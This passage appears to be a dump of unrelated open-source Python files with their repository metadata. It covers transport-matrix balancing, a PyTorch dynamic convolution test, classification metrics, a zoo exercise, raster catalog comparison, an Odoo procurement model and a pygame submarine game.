>>> fratar.output.export("/tmp/to_omx_output.omx")
>>> fratar.output.export("/tmp/to_aem_output.aem")
"""
def __init__(self, project=None, **kwargs):
"""
Instantiates the Ipf problem
:Arguments:
**matrix** (:obj:`AequilibraeMatrix`): Seed Matrix
**rows** (:obj:`AequilibraeData`): Vector object with data for row totals
**row_field** (:obj:`str`): Field name that contains the data for the row totals
**columns** (:obj:`AequilibraeData`): Vector object with data for column totals
**column_field** (:obj:`str`): Field name that contains the data for the column totals
**parameters** (:obj:`str`, optional): Convergence parameters. Defaults to those in the parameter file
**nan_as_zero** (:obj:`bool`, optional): If Nan values should be treated as zero. Defaults to True
:Results:
**output** (:obj:`AequilibraeMatrix`): Result Matrix
**report** (:obj:`list`): Iteration and convergence report
**error** (:obj:`str`): Error description
"""
self.cpus = 0
self.parameters = kwargs.get("parameters", self.__get_parameters("ipf"))
# Seed matrix
self.matrix = kwargs.get("matrix", None) # type: AequilibraeMatrix
# NaN as zero
self.nan_as_zero = kwargs.get("nan_as_zero", True)
# row vector
self.rows = kwargs.get("rows", None)
self.row_field = kwargs.get("row_field", None)
self.output_name = kwargs.get("output", AequilibraeMatrix().random_name())
# Column vector
self.columns = kwargs.get("columns", None)
self.column_field = kwargs.get("column_field", None)
self.output = AequilibraeMatrix()
self.error = None
self.__required_parameters = ["convergence level", "max iterations", "balancing tolerance"]
self.error_free = True
self.report = [" ##### IPF computation ##### ", ""]
self.gap = None
self.procedure_date = ""
self.procedure_id = ""
def __check_data(self):
self.error = None
self.__check_parameters()
# check data types
if not isinstance(self.rows, AequilibraeData):
raise TypeError("Row vector needs to be an instance of AequilibraeData")
if not isinstance(self.columns, AequilibraeData):
raise TypeError("Column vector needs to be an instance of AequilibraeData")
if not isinstance(self.matrix, AequilibraeMatrix):
raise TypeError("Seed matrix needs to be an instance of AequilibraeMatrix")
# Check data type
if not np.issubdtype(self.matrix.dtype, np.floating):
raise ValueError("Seed matrix need to be a float type")
row_data = self.rows.data
col_data = self.columns.data
if not np.issubdtype(row_data[self.row_field].dtype, np.floating):
raise ValueError("production/rows vector must be a float type")
if not np.issubdtype(col_data[self.column_field].dtype, np.floating):
raise ValueError("Attraction/columns vector must be a float type")
# Check data dimensions
if not np.array_equal(self.rows.index, self.columns.index):
raise ValueError("Indices from row vector do not match those from column vector")
if not np.array_equal(self.matrix.index, self.columns.index):
raise ValueError("Indices from vectors do not match those from seed matrix")
# Check if matrix was set for computation
if self.matrix.matrix_view is None:
raise ValueError("Matrix needs to be set for computation")
else:
if len(self.matrix.matrix_view.shape[:]) > 2:
raise ValueError("Matrix' computational view needs to be set for a single matrix core")
if self.error is None:
# check balancing:
sum_rows = np.nansum(row_data[self.row_field])
sum_cols = np.nansum(col_data[self.column_field])
if abs(sum_rows - sum_cols) > self.parameters["balancing tolerance"]:
self.error = "Vectors are not balanced"
else:
# guarantees that they are precisely balanced
col_data[self.column_field][:] = col_data[self.column_field][:] * (sum_rows / sum_cols)
if self.error is not None:
self.error_free = False
def __check_parameters(self):
for i in self.__required_parameters:
if i not in self.parameters:
self.error = "Parameters error. It needs to be a dictionary with the following keys: "
for t in self.__required_parameters:
self.error = self.error + t + ", "
if self.error:
raise ValueError(self.error)
def fit(self):
"""Runs the IPF instance problem to adjust the matrix
Resulting matrix is the *output* class member
"""
self.procedure_id = uuid4().hex
self.procedure_date = str(datetime.today())
t = perf_counter()
self.__check_data()
if self.error_free:
max_iter = self.parameters["max iterations"]
conv_criteria = self.parameters["convergence level"]
if self.matrix.is_omx():
self.output = AequilibraeMatrix()
self.output.create_from_omx(
self.output.random_name(), self.matrix.file_path, cores=self.matrix.view_names
)
self.output.computational_view()
else:
self.output = self.matrix.copy(self.output_name, memory_only=True)
if self.nan_as_zero:
self.output.matrix_view[:, :] = np.nan_to_num(self.output.matrix_view)[:, :]
rows = self.rows.data[self.row_field]
columns = self.columns.data[self.column_field]
tot_matrix = np.nansum(self.output.matrix_view[:, :])
# Reporting
self.report.append("Target convergence criteria: " + str(conv_criteria))
self.report.append("Maximum iterations: " + str(max_iter))
self.report.append("")
self.report.append("Rows:" + str(self.rows.entries))
self.report.append("Columns: " + str(self.columns.entries))
self.report.append("Total of seed matrix: " + "{:28,.4f}".format(float(tot_matrix)))
self.report.append("Total of target vectors: " + "{:25,.4f}".format(float(np.nansum(rows))))
self.report.append("")
self.report.append("Iteration, Convergence")
self.gap = conv_criteria + 1
seed = np.array(self.output.matrix_view[:, :], copy=True)
iter, self.gap = ipf_core(
seed, rows, columns, max_iterations=max_iter, tolerance=conv_criteria, cores=self.cpus
)
self.output.matrix_view[:, :] = seed[:, :]
self.report.append(str(iter) + " , " + str("{:4,.10f}".format(float(np.nansum(self.gap)))))
self.report.append("")
self.report.append("Running time: " + str("{:4,.3f}".format(perf_counter() - t)) + "s")
def save_to_project(self, name: str, file_name: str, project=None) -> MatrixRecord:
"""Saves the matrix output to the project file
:Arguments:
**name** (:obj:`str`): Name of the desired matrix record
**file_name** (:obj:`str`): Name for the matrix file name. AEM and OMX supported
**project** (:obj:`Project`, Optional): Project we want to save the results to.
Defaults to the active project
"""
project = project or get_active_project()
mats = project.matrices
record = mats.new_record(name, file_name, self.output)
record.procedure_id = self.procedure_id
record.timestamp = self.procedure_date
record.procedure = "Iterative Proportional fitting"
record.save()
return record
def __tot_rows(self, matrix):
return np.nansum(matrix, axis=1)
def __tot_columns(self, matrix):
return np.nansum(matrix, axis=0)
def __factor(self, marginals, targets):
f = np.divide(targets, marginals) # We compute the factors
f[f == np.NINF] = 1 # And treat the errors
return f
def __get_parameters(self, model):
path = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
with open(path + "/parameters.yml", "r") as yml:
path = yaml.safe_load(yml)
self.cpus = int(path["system"]["cpus"])
return path["distribution"][model]
|
AequilibraE/aequilibrae
|
aequilibrae/distribution/ipf.py
|
ipf.py
|
py
| 10,544 |
python
|
en
|
code
| 140 |
github-code
|
6
|
32483785153
|
import random
from collections import Counter
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import ConvModule, Scale, bias_init_with_prob, normal_init
from mmcv.runner import force_fp32
import nltk
from nltk.cluster.kmeans import KMeansClusterer
from mmdet.core import (anchor_inside_flags, bbox_overlaps, build_assigner,
build_sampler, images_to_levels, multi_apply,
reduce_mean, unmap)
from mmdet.core.utils import filter_scores_and_topk
class attention1d(nn.Module):
def __init__(self, in_planes=1, ratios=16, K=4, temperature=1, init_weight=True): # quality map
super(attention1d, self).__init__()
assert temperature % 3 == 1
if in_planes != 3:
hidden_planes = int(in_planes * ratios)
else:
hidden_planes = K
self.fc1 = nn.Conv2d(in_planes, hidden_planes, 1, bias=False)
# self.bn = nn.BatchNorm2d(hidden_planes)
self.fc2 = nn.Conv2d(hidden_planes, K, 1, bias=True)
self.temperature = temperature
self.K = K
if init_weight:
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
if isinstance(m ,nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def updata_temperature(self):
if self.temperature!=1:
self.temperature -= 3
print('Change temperature to:', str(self.temperature))
def forward(self, x):
_N, _C, _H, _W = x.size()
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return F.softmax(x / self.temperature, 1)
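# Note on the attention head above (added commentary): fc1/fc2 turn the single-channel
# quality map into K per-pixel logits, and dividing by the temperature before the softmax
# keeps the mixture over the K dynamic kernels soft while the temperature is large and
# sharper as updata_temperature() anneals it toward 1.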
class Dynamic_conv1d(nn.Module):
'''
Args:
x(Tensor): shape (batch, in_channel, height, width)
quality_map(Tensor): shape (batch, 1, height, width)
Return:
output(Tensor): shape (batch, out_channel, height, width)
Note:
        in_channel must equal out_channel
'''
def __init__(self, in_planes, out_planes, ratio=16.0, stride=1, padding=0, dilation=1, bias=True, K=2,temperature=1, init_weight=True):
super(Dynamic_conv1d, self).__init__()
self.in_planes = in_planes
self.out_planes = out_planes
self.stride = stride
self.padding = padding
self.dilation = dilation
self.bias = bias
self.K = K
self.attention = attention1d(1, ratio, K, temperature)
self.weight = nn.Parameter(torch.randn(K, out_planes, in_planes), requires_grad=True)
if bias:
self.bias = nn.Parameter(torch.zeros(K, out_planes))
else:
self.bias = None
if init_weight:
self._initialize_weights()
    # TODO: initialization
def _initialize_weights(self): # maybe problematic
for i in range(self.K):
nn.init.kaiming_uniform_(self.weight[i])
def update_temperature(self):
self.attention.updata_temperature()
def forward(self, x, quality_map):# a different version of dynamic convlution, is another kind of spatial attention
residule = x
batch_size, in_planes, height, width = x.size()
softmax_attention = self.attention(quality_map)
print(f'attention size {softmax_attention.size()}')
print(f'attention {softmax_attention}')
softmax_attention = softmax_attention.permute(0, 2, 3, 1)
print(f'attention size after {softmax_attention.size()}')
print(f'attention after {softmax_attention}')
        # x = x.view(1, -1, width, height)  # reshape into a single dimension for grouped convolution
#weight = self.weight.view(self.K, -1)
        # Generate the dynamic convolution weights: batch_size sets of kernel parameters (each set is different)
#weight = weight.view(self.K, self.in_planes, self.out_planes)
# print(f'softmax_attention {softmax_attention.size()}')
# print(f'self.weight {self.weight.size()}')
weight = self.weight.view(self.K, -1)
print(f'weight size {weight.size()}')
print(f'weight {weight}')
aggregate_weight = torch.matmul(softmax_attention, weight).view(batch_size, height, width, self.out_planes, self.in_planes)# (N, H, W, C2, C1)
print(f'aggregate_weight size {aggregate_weight.size()}')
print(f'aggregate_weight {aggregate_weight}')
aggregate_weight = aggregate_weight.permute(3, 0, 4, 1, 2) # (C2, N, C1, H, W)
print(f'aggregate_weight after size {aggregate_weight.size()}')
print(f'aggregate_weight after {aggregate_weight}')
output = aggregate_weight * x[None, :, :, :, :]
# if self.bias is not None:
# aggregate_bias = torch.matmul(softmax_attention, self.bias).permute(0, 3, 1, 2) # (N, C1, H, W)
# print(aggregate_bias.size())
# print(softmax_attention.size())
# output = output + aggregate_bias
output = output.sum(dim=0) # (N, C1, H, W)
return residule + output
dy1 = Dynamic_conv1d(2, 1)
x = torch.tensor([[[[1, 2],[3, 4]],[[5, 6],[7, 8]]]], dtype=torch.float32)
y = torch.tensor([[[[1,2],[3,4]]]], dtype=torch.float32)
print(f'x size {x.size()}')
print(f'x {x}')
print(f'y size {y.size()}')
print(f'y {y}')
result = dy1(x, y)
print(f'output size {result.size()}')
print(f'output {result}')
|
johnran103/mmdet
|
test_dy_conv.py
|
test_dy_conv.py
|
py
| 5,635 |
python
|
en
|
code
| 1 |
github-code
|
6
|
17940292131
|
from sklearn.metrics import confusion_matrix, roc_auc_score
import json
import numpy as np
def general_result(y_true, y_score, threshold=0.6):
def pred(score, best_thresh):
label = 0
if score > best_thresh:
label = 1
return label
y_score = np.array(y_score)
if len(y_score.shape) == 2:
y_score = y_score[:,1]
# best_thresh = select_threshold(y_true, y_score)
best_thresh = threshold
y_pred = [pred(score, best_thresh) for score in y_score]
c_m = confusion_matrix(y_true, y_pred)
print("model works on the data, the confusion_matrix is:(Threshold:{})".format(str(best_thresh)), c_m)
acc = (c_m[0, 0]+c_m[1, 1])/(c_m[0, 0]+c_m[0, 1]+c_m[1, 0]+c_m[1, 1])
print("model works on the data, the accuracy is:", acc)
pre = c_m[1, 1]/(c_m[1, 1]+c_m[0, 1])
print("model works on the data, the precision is:", pre)
re = c_m[1, 1]/(c_m[1, 1]+c_m[1, 0])
print("model works on the data, the recall is:", re)
f_score = (2*pre*re)/(pre+re)
print("model works on the data, the F1-score is:", f_score)
#train_label_binary = to_categorical(train_label)
auc = roc_auc_score(y_true, y_score)
print("model works on the data, the auc is:", auc)
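# Minimal usage sketch (hypothetical labels and scores, added for illustration):
#   general_result([0, 1, 1, 0], [0.2, 0.9, 0.7, 0.4], threshold=0.5)
# prints the confusion matrix, accuracy, precision, recall, F1 and AUC at the 0.5 cut-off.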
def select_threshold(y_true, y_score):
def pred(score, threshold):
label = 0
if score > threshold:
label = 1
return label
best_th = 0
f1_score = 0
output = {'Precision':[], 'Recall':[]}
for i in range(1,100):
threshold = i/100
y_pred = [pred(score, threshold) for score in y_score]
c_m = confusion_matrix(y_true, y_pred)
try:
pre = c_m[1, 1]/(c_m[1, 1]+c_m[0, 1])
re = c_m[1, 1]/(c_m[1, 1]+c_m[1, 0])
output['Precision'].append(pre)
output['Recall'].append((re))
f_score = (2*pre*re)/(pre+re)
if f_score>f1_score :
f1_score = f_score
best_th = threshold
except:
continue
if len(output['Precision']) != 99:
print("Unknown Error occurred when generate results.")
with open('Precision_Recall.txt','w') as w:
w.write(json.dumps(output))
return best_th
|
jingmouren/antifraud
|
antifraud/metrics/normal_function.py
|
normal_function.py
|
py
| 2,233 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71567880507
|
class Zoo:
__animals = 0
def __init__(self, name):
self.name = name
self.mammals =[]
self.fishes = []
self.birds = []
def add_animal(self, species, name):
if species == 'mammal':
self.mammals.append(name)
elif species == 'fish':
self.fishes.append(name)
elif species == 'bird':
self.birds.append(name)
Zoo.__animals +=1
def get_info(self, species):
result = ''
if species == 'mammal':
result += f"Mammals in {self.name}: {', '.join(self.mammals)}"
elif species == 'fish':
result += f"Fishes in {self.name}: {', '.join(self.fishes)}"
elif species == 'bird':
result += f"Birds in {self.name}: {', '.join(self.birds)}"
result += f'\nTotal animals: {Zoo.__animals}'
return result
name_of_zoo = input()
zoo = Zoo(name_of_zoo)
number_of_lines = int(input())
for _ in range(number_of_lines):
info = input().split(' ')
species = info[0]
type_of_animal = info[1]
zoo.add_animal(species, type_of_animal)
additional_info = input()
print(zoo.get_info(additional_info))
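# Example session (illustrative input/output, added for clarity):
#   input:  "Sofia Zoo", 3, "mammal lion", "bird eagle", "fish salmon", "bird"
#   output: "Birds in Sofia Zoo: eagle" followed by "Total animals: 3"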
|
lorindi/SoftUni-Software-Engineering
|
Programming-Fundamentals-with-Python/6.Objects and Classes/4_zoo.py
|
4_zoo.py
|
py
| 1,179 |
python
|
en
|
code
| 3 |
github-code
|
6
|
36396554295
|
"""
Compare catalogs of candidates and benchmarks.
"""
from __future__ import annotations
# __all__ = ['*']
__author__ = "Fernando Aristizabal"
from typing import Iterable, Optional, Callable, Tuple
import os
import pandas as pd
from rioxarray import open_rasterio as rxr_or
import xarray as xr
import dask.dataframe as dd
def catalog_compare(
candidate_catalog: pd.DataFrame | dd.DataFrame,
benchmark_catalog: pd.DataFrame | dd.DataFrame,
map_ids: str | Iterable[str],
how: str = "inner",
on: Optional[str | Iterable[str]] = None,
left_on: Optional[str | Iterable[str]] = None,
right_on: Optional[str | Iterable[str]] = None,
suffixes: tuple[str, str] = ("_candidate", "_benchmark"),
merge_kwargs: Optional[dict] = None,
open_kwargs: Optional[dict] = None,
compare_type: str | Callable = "continuous",
compare_kwargs: Optional[dict] = None,
agreement_map_field: Optional[str] = None,
agreement_map_write_kwargs: Optional[dict] = None,
) -> pd.DataFrame | dd.DataFrame:
"""
Compare catalogs of candidate and benchmark maps.
Parameters
----------
candidate_catalog : pandas.DataFrame | dask.DataFrame
Candidate catalog.
benchmark_catalog : pandas.DataFrame | dask.DataFrame
Benchmark catalog.
map_ids : str | Iterable of str
Column name(s) where maps or paths to maps occur. If str is given, then the same value should occur in both catalogs. If Iterable[str] is given of length 2, then the column names where maps are will be in [candidate, benchmark] respectively.
The columns corresponding to map_ids should have either str, xarray.DataArray, xarray.Dataset, rasterio.io.DatasetReader, rasterio.vrt.WarpedVRT, or os.PathLike objects.
how : str, default = "inner"
Type of merge to perform. See pandas.DataFrame.merge for more information.
on : str | Iterable of str, default = None
Column(s) to join on. Must be found in both catalogs. If None, and left_on and right_on are also None, then the intersection of the columns in both catalogs will be used.
left_on : str | Iterable of str, default = None
Column(s) to join on in left catalog. Must be found in left catalog.
right_on : str | Iterable of str, default = None
Column(s) to join on in right catalog. Must be found in right catalog.
suffixes : tuple of str, default = ("_candidate", "_benchmark")
Suffixes to apply to overlapping column names in candidate and benchmark catalogs, respectively. Length two tuple of strings.
merge_kwargs : dict, default = None
        Keyword arguments to pass to pandas.DataFrame.merge.
    open_kwargs : dict, default = None
        Keyword arguments to pass to rioxarray.open_rasterio when maps are given as file paths.
compare_type : str | Callable, default = "continuous"
Type of comparison to perform. If str, then must be one of {"continuous", "categorical", "probabilistic"}. If Callable, then must be a function that takes two xarray.DataArray or xarray.Dataset objects and returns a tuple of length 2. The first element of the tuple must be an xarray.DataArray or xarray.Dataset object representing the agreement map. The second element of the tuple must be a pandas.DataFrame object representing the metrics.
compare_kwargs : dict, default = None
Keyword arguments to pass to the compare_type function.
agreement_map_field : str, default = None
Column name to write agreement maps to. If None, then agreement maps will not be written to file.
agreement_map_write_kwargs : dict, default = None
Keyword arguments to pass to xarray.DataArray.rio.to_raster when writing agreement maps to file.
Raises
------
ValueError
If map_ids is not str or Iterable of str.
If compare_type is not str or Callable.
If compare_type is str and not one of {"continuous", "categorical", "probabilistic"}.
NotImplementedError
If compare_type is "probabilistic".
Returns
-------
pandas.DataFrame | dask.DataFrame
Agreement catalog.
"""
# unpack map_ids
if isinstance(map_ids, str):
candidate_map_ids, benchmark_map_ids = map_ids, map_ids
elif isinstance(map_ids, Iterable):
candidate_map_ids, benchmark_map_ids = map_ids
else:
raise ValueError("map_ids must be str or Iterable of str")
# set merge_kwargs to empty dict if None
if merge_kwargs is None:
merge_kwargs = dict()
# create agreement catalog
agreement_catalog = candidate_catalog.merge(
benchmark_catalog,
how=how,
on=on,
left_on=left_on,
right_on=right_on,
suffixes=suffixes,
**merge_kwargs,
)
def compare_row(
row,
compare_type: str | Callable,
compare_kwargs: dict,
open_kwargs: dict,
agreement_map_field: str,
agreement_map_write_kwargs: dict,
) -> Tuple[xr.DataArray | xr.Dataset, pd.DataFrame]:
"""Compares catalog and benchmark maps by rows"""
def loadxr(map, open_kwargs):
"""load xarray object if not already"""
return (
map
if isinstance(map, (xr.DataArray, xr.Dataset))
else rxr_or(map, **open_kwargs)
)
# load maps
candidate_map = loadxr(row[candidate_map_ids + suffixes[0]], open_kwargs)
benchmark_map = loadxr(row[benchmark_map_ids + suffixes[1]], open_kwargs)
# set compare_kwargs to empty dict if None
if compare_kwargs is None:
compare_kwargs = dict()
# set agreement_map_write_kwargs to empty dict if None
if agreement_map_write_kwargs is None:
agreement_map_write_kwargs = dict()
if isinstance(compare_type, str):
if compare_type == "categorical":
results = candidate_map.gval.categorical_compare(
benchmark_map, **compare_kwargs
)
# results is a tuple of length 3 or 4
# agreement_map, crosstab_df, metrics_df, attrs_df = results
# where attrs_df is optional
agreement_map, metrics_df = results[0], results[2]
elif compare_type == "continuous":
results = candidate_map.gval.continuous_compare(
benchmark_map, **compare_kwargs
)
# results is a tuple of length 2 or 3
# agreement_map, metrics_df, attrs_df = results
# where attrs_df is optional
agreement_map, metrics_df = results[:2]
elif compare_type == "probabilistic":
raise NotImplementedError(
"probabilistic comparison not implemented yet"
)
else:
raise ValueError(
"compare_type of type str must be one of {'continuous', 'categorical', 'probabilistic'}"
)
elif isinstance(compare_type, Callable):
agreement_map, metrics_df = compare_type(
candidate_map, benchmark_map, **compare_kwargs
)
else:
raise ValueError("compare_type must be str or Callable")
# write agreement map to file
        if (agreement_map_field is not None) and isinstance(
agreement_map, (xr.DataArray, xr.Dataset)
):
if isinstance(row[agreement_map_field], (str, os.PathLike)):
agreement_map.rio.to_raster(
row[agreement_map_field], **agreement_map_write_kwargs
)
return metrics_df
# make kwargs for dask apply
if isinstance(agreement_catalog, dd.DataFrame):
dask_kwargs = {"meta": ("output", "f8")}
else:
dask_kwargs = {}
# set open_kwargs to empty dict if None
if open_kwargs is None:
open_kwargs = dict()
# apply compare_row to each row of agreement_catalog
metrics_df = agreement_catalog.apply(
compare_row,
axis=1,
**dask_kwargs,
compare_type=compare_type,
open_kwargs=open_kwargs,
compare_kwargs=compare_kwargs,
agreement_map_field=agreement_map_field,
agreement_map_write_kwargs=agreement_map_write_kwargs,
)
def nested_merge(i, sub_df) -> pd.DataFrame:
"""Duplicated agreement row for each row in sub_df"""
try:
agreement_row = agreement_catalog.iloc[i].to_frame().T
except NotImplementedError:
agreement_row = agreement_catalog.loc[agreement_catalog.index == i]
sub_df.index = [i] * len(sub_df)
return agreement_row.join(sub_df)
# merge agreement_catalog with metrics_df
if isinstance(metrics_df, dd.Series):
return dd.concat(
[nested_merge(i, sub_df) for i, sub_df in enumerate(metrics_df)]
).reset_index(drop=True)
if isinstance(metrics_df, pd.Series):
return pd.concat(
[nested_merge(i, sub_df) for i, sub_df in enumerate(metrics_df)]
).reset_index(drop=True)
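# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# A minimal, hedged example of how catalog_compare might be called; the column
# names ("region", "map_path") and raster file names below are hypothetical.
#
#   import pandas as pd
#
#   candidate_catalog = pd.DataFrame(
#       {"region": ["r1", "r2"], "map_path": ["cand_r1.tif", "cand_r2.tif"]}
#   )
#   benchmark_catalog = pd.DataFrame(
#       {"region": ["r1", "r2"], "map_path": ["bench_r1.tif", "bench_r2.tif"]}
#   )
#
#   agreement_catalog = catalog_compare(
#       candidate_catalog,
#       benchmark_catalog,
#       map_ids="map_path",
#       on="region",
#       compare_type="continuous",
#   )
#   # agreement_catalog holds the merged catalog joined with the per-row metrics;
#   # because "map_path" is not a join key, the merge yields the suffixed columns
#   # "map_path_candidate" / "map_path_benchmark" that compare_row expects.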
|
NOAA-OWP/gval
|
src/gval/catalogs/catalogs.py
|
catalogs.py
|
py
| 9,027 |
python
|
en
|
code
| 14 |
github-code
|
6
|
1547074247
|
from settings import *  # expected to provide pd (pandas), plt (matplotlib.pyplot) and sns (seaborn)
# Import Data
df = pd.read_csv("data/mpg_ggplot2.csv")
# Draw Stripplot
fig, ax = plt.subplots(figsize=(16, 10), dpi=80)
sns.stripplot(x=df.cty, y=df.hwy, jitter=0.25, size=8, ax=ax, linewidth=.5)  # keyword args required by newer seaborn
# Decorations
plt.title('Use jittered plots to avoid overlapping of points', fontsize=22)
plt.show()
|
Rygor83/Plotting_with_python
|
05.py
|
05.py
|
py
| 320 |
python
|
en
|
code
| 1 |
github-code
|
6
|
29643271631
|
# -*- coding: utf-8 -*-
# (c) 2015 Alfredo de la Fuente - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp import models, fields, api
from dateutil.relativedelta import relativedelta
class ProcurementOrder(models.Model):
_inherit = 'procurement.order'
@api.multi
def _compute_protect_date_planned(self):
for proc in self:
proc.protect_date_planned = False
if (proc.purchase_line_id and
proc.purchase_line_id.order_id.state != 'draft'):
proc.protect_date_planned = True
plan = fields.Many2one('procurement.plan', string='Plan')
location_type = fields.Selection([
('supplier', 'Supplier Location'),
('view', 'View'),
('internal', 'Internal Location'),
('customer', 'Customer Location'),
('inventory', 'Inventory'),
('procurement', 'Procurement'),
('production', 'Production'),
('transit', 'Transit Location')],
string='Location Type', related="location_id.usage", store=True)
protect_date_planned = fields.Boolean(
string='Protect Date Planned', compute='_compute_protect_date_planned')
@api.model
def create(self, data):
if 'plan' in self.env.context and 'plan' not in data:
data['plan'] = self.env.context.get('plan')
procurement = super(ProcurementOrder, self).create(data)
return procurement
@api.multi
def button_remove_plan(self):
self.ensure_one()
template_obj = self.env['product.template']
result = template_obj._get_act_window_dict(
'procurement_plan.action_procurement_plan')
result['domain'] = "[('id', '=', " + str(self.plan.id) + ")]"
result['res_id'] = self.plan.id
result['view_mode'] = 'form'
result['views'] = []
self.plan.write({'procurement_ids': [[3, self.id]]})
return result
@api.multi
def button_run(self, autocommit=False):
for procurement in self:
procurement.with_context(plan=procurement.plan.id).run(
autocommit=autocommit)
procurement.plan._get_state()
plans = self.mapped('plan')
if not plans:
return True
res = {'view_type': 'form,tree',
'res_model': 'procurement.plan',
'view_id': False,
'type': 'ir.actions.act_window',
}
if len(plans) == 1:
res.update({'view_mode': 'form',
'res_id': plans[0].id,
'target': 'current'})
else:
res.update({'view_mode': 'tree',
'domain': [('id', 'in', plans.ids)],
'target': 'new'})
return res
@api.multi
def button_check(self, autocommit=False):
for procurement in self:
procurement.with_context(plan=procurement.plan.id).check(
autocommit=autocommit)
procurement.plan._get_state()
plans = self.mapped('plan')
if not plans:
return True
res = {'view_type': 'form,tree',
'res_model': 'procurement.plan',
'view_id': False,
'type': 'ir.actions.act_window',
}
if len(plans) == 1:
res.update({'view_mode': 'form',
'res_id': plans[0].id,
'target': 'current'})
else:
res.update({'view_mode': 'tree',
'domain': [('id', 'in', plans.ids)],
'target': 'new'})
return res
@api.multi
def cancel(self):
super(ProcurementOrder, self).cancel()
for procurement in self:
if procurement.plan:
procurement.plan._get_state()
plans = self.mapped('plan')
if not plans:
return True
res = {'view_type': 'form,tree',
'res_model': 'procurement.plan',
'view_id': False,
'type': 'ir.actions.act_window',
}
if len(plans) == 1:
res.update({'view_mode': 'form',
'res_id': plans[0].id,
'target': 'current'})
else:
res.update({'view_mode': 'tree',
'domain': [('id', 'in', plans.ids)],
'target': 'new'})
return res
@api.multi
def reset_to_confirmed(self):
super(ProcurementOrder, self).reset_to_confirmed()
for procurement in self:
if procurement.plan:
procurement.plan._get_state()
plans = self.mapped('plan')
if not plans:
return True
res = {'view_type': 'form,tree',
'res_model': 'procurement.plan',
'view_id': False,
'type': 'ir.actions.act_window',
}
if len(plans) == 1:
res.update({'view_mode': 'form',
'res_id': plans[0].id,
'target': 'current'})
else:
res.update({'view_mode': 'tree',
'domain': [('id', 'in', plans.ids)],
'target': 'new'})
return res
@api.multi
def _change_date_planned_from_plan_for_po(self, days_to_sum):
for proc in self:
new_date = (fields.Datetime.from_string(proc.date_planned) +
(relativedelta(days=days_to_sum)))
proc.write({'date_planned': new_date})
if (proc.purchase_line_id and
proc.purchase_line_id.order_id.state == 'draft'):
proc.purchase_line_id.write({'date_planned': new_date})
|
odoomrp/odoomrp-wip
|
procurement_plan/models/procurement.py
|
procurement.py
|
py
| 5,931 |
python
|
en
|
code
| 119 |
github-code
|
6
|
35093472448
|
import pygame, sys, operator, random, time
from pygame.locals import *
# Global variables
WIDTH = 800
HEIGHT = 500
SUB_SPEED = 3
BUBBLE_MAX_SPEED = 1
TIME_LIMIT = 30
BONUS_SCORE = 1500
BLACK = (0, 0, 0)
BLUE = (12,34,56)
RED = (255,0,0)
WHITE = (255,255,255)
x_sub = 40
y_sub = 250
score = 0
game_end = time.time() + TIME_LIMIT
bonus = 0
# bubbles_id = list()
bubbles_pos = list()
bubbles_speed = list()
bubbles_state = list()
bubbles_size = list()
# Quit the game
def leave_game():
pygame.display.quit()
pygame.quit()
sys.exit()
# Update the screen display
def update_screen ():
screen.blit(background_image, (0,0))
screen.blit(sub, (x_sub, y_sub))
for i in range(len(bubbles_pos) - 1, -1, -1):
if bubbles_state[i] == "Good":
screen.blit(pygame.transform.scale(blue_bubble, (bubbles_size[i], bubbles_size[i])), bubbles_pos[i])
else:
screen.blit(pygame.transform.scale(bad_bubble, (bubbles_size[i], bubbles_size[i])), bubbles_pos[i])
message = "Score : " + str(score)
display_text (message, BLACK, 'Calibri', 20, 10, 15)
# print ("Time : ", int(game_end - time.time()))
message = "Time : " + str(int(game_end - time.time()))
display_text (message, BLACK, 'Calibri', 20, 700, 15)
pygame.display.flip()
# Move the submarine on the scene
def sub_control():
global x_sub, y_sub
key = pygame.key.get_pressed()
if key[pygame.K_RIGHT]:
x_sub += SUB_SPEED
if key[pygame.K_LEFT]:
x_sub -= SUB_SPEED
if key[pygame.K_UP]:
y_sub -= SUB_SPEED
if key[pygame.K_DOWN]:
y_sub += SUB_SPEED
sub_in_scene()
# Check if the sub is still on the visible part of the screen
def sub_in_scene():
global x_sub, y_sub
if x_sub < 0:
x_sub = 0
if y_sub < 0:
y_sub = 0
if x_sub + sub.get_width() > WIDTH:
x_sub = WIDTH - sub.get_width()
if y_sub + sub.get_height() > HEIGHT:
y_sub = HEIGHT - sub.get_height()
# Create many bubbles
def create_bubbles(state) :
x_bubble = WIDTH
y_bubble = random.randint(0, HEIGHT)
if state == "Good":
#bubble = pygame.image.load("Ressources/bulle.png")
        size_bubble = random.randint(blue_bubble.get_width() // 3, blue_bubble.get_width() * 2)  # integer division: randint needs ints
else:
#bubble = pygame.image.load("Ressources/red_bulle.png")
size_bubble = random.randint(bad_bubble.get_width(), bad_bubble.get_width() * 3)
# bubble = pygame.transform.scale (bubble, (size_bubble, size_bubble))
# bubbles_id.append(bubble)
bubbles_pos.append((x_bubble, y_bubble))
bubbles_speed.append(random.randint(1, BUBBLE_MAX_SPEED))
bubbles_state.append(state)
bubbles_size.append(size_bubble)
# Move the bubble on the screen at set speed
def move_bubbles():
for i in range (len(bubbles_pos) - 1, -1, -1) :
bubbles_pos[i] = tuple(map(operator.sub, bubbles_pos[i], (bubbles_speed[i], 0)))
# Update bubble position
def update_game():
global bonus, game_end
if (random.randint(1, 20) == 1):
create_bubbles("Good")
if (random.randint(1, 60) == 1):
create_bubbles("Bad")
collision()
if (int(score / BONUS_SCORE)) > bonus:
bonus += 1
game_end += TIME_LIMIT
move_bubbles()
clean_bubbles()
# Collision between the sub and the bubbles
def collision () :
global score, game_end
for bubble in range(len(bubbles_pos) -1, -1, -1):
if (x_sub < bubbles_pos[bubble][0] + bubbles_size[bubble]
and x_sub + sub.get_width() > bubbles_pos[bubble][0]
and y_sub < bubbles_pos[bubble][1] + bubbles_size[bubble]
and y_sub + sub.get_height() > bubbles_pos[bubble][1]) :
# print ("La bulle ", bubble, "se superpose au sous-marin")
print("etat de la bulle : ", bubbles_state[bubble])
if bubbles_state[bubble] == "Good":
score += bubbles_size[bubble] + bubbles_speed[bubble]
else:
game_end -= 5
